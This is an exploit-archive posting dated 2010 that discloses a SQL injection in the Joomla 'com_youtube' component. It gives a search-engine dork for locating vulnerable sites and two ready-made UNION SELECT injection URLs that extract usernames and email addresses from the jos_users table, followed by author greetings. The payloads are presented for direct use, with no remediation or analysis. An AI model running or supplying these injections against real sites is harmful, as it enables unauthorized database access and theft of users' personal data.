Joomla Component (com_youtube) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component (com_youtube) SQL Injection Vulnerability
# Published : 2010-07-24
# Author : Forza-Dz
# Previous Title : Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability
# Next Title : Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability

# Exploit Title: Joomla "com_youtube"  Sql Injection Vulnerability
# Date: 2010-07-24

# Author: Forza-Dz

# Software Link: http://extensions.joomla.org/extensions/multimedia/
multimedia-channels/video-channels/12037
# Version: 1.5
# Tested on: windows-xp-sp2-fr : windows-xp-sp3-fr


============================================================================== 
\\\\\ Joomla "com_youtube" Sql Injection Vulnerability ///////// 
============================================================================== 
  
***************************************************************************
*************************************************************************** 
Dork = inurl:"com_youtube"
########################################################################### 
 ===[ Exploit ]===
http://www.site.com/index.php?option=com_youtube&id_cate=4 

union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
or
http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
########################################################################### 
Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM"           
###########################################################################